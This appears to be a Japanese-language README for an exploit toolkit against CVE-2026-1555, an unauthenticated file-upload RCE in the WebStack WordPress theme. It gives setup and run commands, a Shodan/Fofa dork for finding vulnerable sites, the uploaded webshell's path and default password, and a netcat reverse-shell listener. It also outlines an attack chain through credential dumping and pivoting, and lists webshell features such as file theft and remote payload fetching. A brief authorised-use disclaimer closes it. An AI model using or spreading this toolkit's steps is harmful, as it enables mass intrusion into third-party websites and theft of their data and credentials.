
WebStack WordPressテーマにおける深刻な認証不要のファイルアップロードRCEであるCVE-2026-1555向けの自動化エクスプロイトツールキット。PyQt5 GUI、dorkベースのターゲット探索、およびポストエクスプロイテーション用の多機能PHPウェブシェルを特徴とします。
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝
██║ ██║ ██║█████╗ █████╔╝██║██╔██║ █████╔╝███████╗
██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔═══╝ ██╔═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝
WordPress WebStackテーマ — 未認証リモートコード実行
教育目的および許可を得たペネトレーションテストのみに使用してください。
CVE-2026-1555 は、WebStack WordPressテーマに影響を及ぼす重大な脆弱性で、未認証の攻撃者が任意ファイルアップロードを実行し、対象サーバー上で**リモートコード実行(RCE)**を可能にします。
このツールキット(FriendsExploit)は、dorkスキャンを統合したシンプルなPyQt5 GUIを使用して、脆弱なターゲットの発見と悪用を自動化します。
Target Surface → WordPress sites running WebStack theme
Vuln Type → Unauthenticated Arbitrary File Upload → RCE
CVSS Score → 9.8 (Critical)
Auth Required → None
Payload → ms.php (Multi-feature PHP Webshell)
CVE-2026-1555-Linux/
│
├── CVE-2026-1555.py # Main exploit tool (PyQt5 GUI)
├── ms.php # PHP webshell payload
├── Dork.txt # Fofa/Shodan dork for target discovery
├── requirements.txt # Python dependencies
└── README.md # You are here
| 項目 | バージョン |
|---|---|
| Python | 3.8+ |
| PyQt5 | ≥ 5.15.0 |
| requests | ≥ 2.31.0 |
| urllib3 | ≥ 2.0.0 |
| OS | Linux(Debian/Ubuntu/Kali推奨) |
git clone https://github.com/YOUR_USERNAME/CVE-2026-1555-Linux.git
cd CVE-2026-1555-Linux
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Kali / Debianユーザー — pipでPyQt5が失敗する場合は、先にシステム全体にインストールしてください:
sudo apt install python3-pyqt5 -y
python3 CVE-2026-1555.py
GUIが起動します。ターゲットを手動で読み込むか、内蔵のdorkスキャナーを使用してください。
ms.php悪用に成功すると、ツールはms.phpをターゲットにアップロードします。
https://target.com/wp-content/themes/WebStack/ms.php
デフォルトパスワード: fr13nds2026
あなたのマシンでリスナーを起動します:
nc -lvnp 4444
ウェブシェルのREVSHELLタブで → IPとポートを入力 → FIREを押します。
Fofa / Shodan dork(Dork.txtより):
body="wp-content/themes/WebStack"
FofaまたはShodanに貼り付けて、脆弱なターゲットを列挙してください。
[1] Discover target via dork scan
↓
[2] Confirm WebStack theme installation
↓
[3] Trigger vulnerable upload endpoint (no auth required)
↓
[4] Upload ms.php payload to webroot
↓
[5] Access webshell → achieve RCE
↓
[6] Escalate: dump DB creds, pivot, revshell
ヘッドレスサーバーでのPyQt5表示エラー:
export DISPLAY=:0
# or use Xvfb
sudo apt install xvfb -y
Xvfb :0 -screen 0 1024x768x24 &
export DISPLAY=:0
python3 CVE-2026-1555.py
PyQt5のpipインストールが失敗する場合:
sudo apt install python3-pyqt5 python3-pyqt5.qtwebengine -y
スクリプト実行時に権限拒否(Permission denied)が発生する場合:
chmod +x CVE-2026-1555.py
python3 CVE-2026-1555.py
requests/urllib3のSSLエラーが発生する場合:
pip install --upgrade requests urllib3 certifi
git clone https://github.com/YOUR_USERNAME/CVE-2026-1555-Linux.git && \
cd CVE-2026-1555-Linux && \
python3 -m venv venv && source venv/bin/activate && \
pip install -r requirements.txt -q && \
python3 CVE-2026-1555.py
This tool is intended for authorized security research and penetration testing
only. The authors are not responsible for any misuse or damage caused by this
program. Only use against systems you own or have explicit written permission
to test. Unauthorized use is illegal.
FriendsExploit • CVE-2026-1555 • Linux版
研究者向けに作られています。責任を持って使用してください。
| モジュール | 説明 |
|---|
| 🖥️ SYSINFO | PHPバージョン、OS、現在のユーザー、セーフモード状態、サーバー変数 |
| 💻 TERMINAL | ライブ出力付きの完全なコマンド実行 — 6種類の実行メソッドに対応 |
| 📂 FILES | サーバー上の任意のファイルの読み取り/書き込み/編集/削除/ダウンロード |
| 📤 UPLOAD | 任意のパスにファイルをアップロード、またはwget/curlでリモートファイルを取得 |
| 🔄 REVSHELL | ワンクリックでリバースシェルを発火 + ビルド済みのbash/python3/perl/nc/phpシェル |
| 🗄️ DB SCAN | wp-config.phpを自動検出、DB認証情報をダンプ、手動MySQLランナー |
| 項目 | 詳細 |
|---|
| CVE ID | CVE-2026-1555 |
| 影響を受けるソフトウェア | WebStack WordPressテーマ |
| 脆弱性の種類 | 未認証の任意ファイルアップロード → RCE |
| 攻撃ベクトル | ネットワーク |
| 認証 | 不要 |
| CVSS v3スコア | 9.8 Critical |
| 影響を受けるバージョン | パッチ適用前の全バージョン |